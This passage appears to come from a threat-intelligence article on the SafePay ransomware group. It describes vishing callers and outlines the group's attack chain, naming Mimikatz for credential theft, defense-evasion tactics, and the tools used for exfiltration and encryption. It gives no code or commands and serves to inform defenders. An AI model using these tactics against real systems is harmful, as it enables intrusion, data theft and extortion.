Callers are usually fluent in English and other languages, and they have strong verbal and conversational skills. The role of a caller is to call a target, impersonate a trusted figure, and manipulate the victim into participating in the scam. This is a special type of con that some ransomware groups want to hand off to someone else. Whether a group uses internal or third-party callers, you cannot assume that a vishing scammer will have a noticeable accent or an AI voice.
You can see examples of attempted vishing scams and aggressive callers in ‘scambaiting’ videos on YouTube. Fair warning: Some scambaiters remove offensive language and phrases, but you may want to assume all scambaiting content is inappropriate for work and kids.
SafePay attack chain
Aside from social engineering, SafePay has been observed using stolen credentials, weak/default passwords, exploits and security misconfiguration to gain access to systems. They may establish access on their own or purchase access from an initial access broker (IAB). After initial access is established, the attack proceeds through the typical steps.
Privilege escalation: Once inside the network, attackers escalate privileges to gain deeper control. Techniques involve exploiting operating system vulnerabilities and weak security, and stealing credentials using tools like Mimikatz. This allows the attack to transition from basic user access to administrator or system-level rights. If successful, the attackers may gain unfettered access in the subsequent phases of the attack.
Lateral movement: Attackers move through the network to discover sensitive data and additional resources. By this point, they are using several “living-off-the-land” techniques to map the network and carry out other steps in the attack.
Defense evasion: The attack will attempt to disable antivirus, clear event logs, obfuscate malicious code, and alter system registries to turn off security alerts. SafePay also attempts to establish persistence, usually through modifying startup items or configuring remote access software. Persistence is used to resume an interrupted attack and establish long-term access to the system if needed.
Data collection & exfiltration: Data is identified, collected, and compressed for exfiltration. SafePay has been observed using WinRAR and 7-Zip for compression, and RClone and FileZilla FTP for data transfer.
Encryption & extortion: Once critical data has been exfiltrated, the ransomware payload encrypts the files and renames each with a .safepay file extension. SafePay drops a ransom note (readme_safepay.txt) with payment instructions and threats of data exposure on leak sites.